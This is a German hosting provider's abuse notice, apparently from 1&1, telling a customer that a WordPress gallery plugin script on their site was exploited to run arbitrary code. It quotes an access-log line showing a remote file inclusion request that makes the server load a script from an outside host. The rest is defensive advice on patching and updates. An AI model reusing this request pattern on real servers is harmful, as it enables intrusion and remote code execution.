Sehr geehrter Herr …,
wir registrierten vor kurzem einen Crackversuch auf unseren Servern, der
von Ihrer Präsenz ausging. Der Angreifer versuchte, sich durch
Sicherheitslücken in den von Ihnen verwendeten Scripten Zugriff zum
Server zu verschaffen. Es ist davon auszugehen, dass der Angreifer
Zugriff auf Ihre Daten erhalten konnte.
Bitte prüfen Sie die Inhalte Ihrer Präsenz und ändern Sie Ihre
Passwörter. Wir empfehlen Ihnen, schnellstmöglich Ihre Scripte zu
überarbeiten, um solche Probleme so weit wie möglich auszuschliessen.
Es handelt sich um das Script
"/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php",
welches über den Parameter "myPath" die Ausführung beliebigen Codes
erlaubt:
207.44.232.99 - - [05/Nov/2007:20:00:22 +0100] "GET
/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=ht
tp://holymusic.org/ver_2006/img/fq.txt? HTTP/1.1" 200 913
http://ihre%20url "-" "libwww-perl/5.808" "-"
Wir haben das PHP-Feature `allow_url_fopen' für das entsprechende
Verzeichnis deaktiviert. Trotzdem empfehlen wir, das Script zu
überarbeiten.
Wir empfehlen Ihnen sich regelmäßig über Updates aller installierten
Software zu informieren, z.B. über entsprechende Announce-Mailinglisten
oder Foren des Herstellers. Insbesondere gilt dies auch für die
Komponenten von Drittherstellern der verwendeten Applikationen. Diese
sind mittlerweile ein gängiges Angriffsziel. Es werden mit Updates
teilweise auch Lücken geschlossen, die nicht in den Release-Notes der
Software verzeichnet sind. Verwenden Sie lediglich Programme aus
vertrauenswürdigen Quellen.
Falls Sie selbstgeschriebene Scripte einsetzen, dann dürfte folgender
Artikel ebenfalls von Interesse für Sie sein:
1&1 Hilfe-Center
--
Mit freundlichen Grüßen,
Ingvar Gilbert
1&1 WebHosting
1&1 Internet AG
Brauerstraße 48
76135 Karlsruhe
Amtsgericht Montabaur HRB 6484
Vorstand: Henning Ahlert, Ralph Dommermuth, Matthias Ehrlich, Andreas
Gauger, Matthias Greve, Robert Hoffmann, Norbert Lang, Achim Weiss
Aufsichtsratsvorsitzender: Michael Scheeren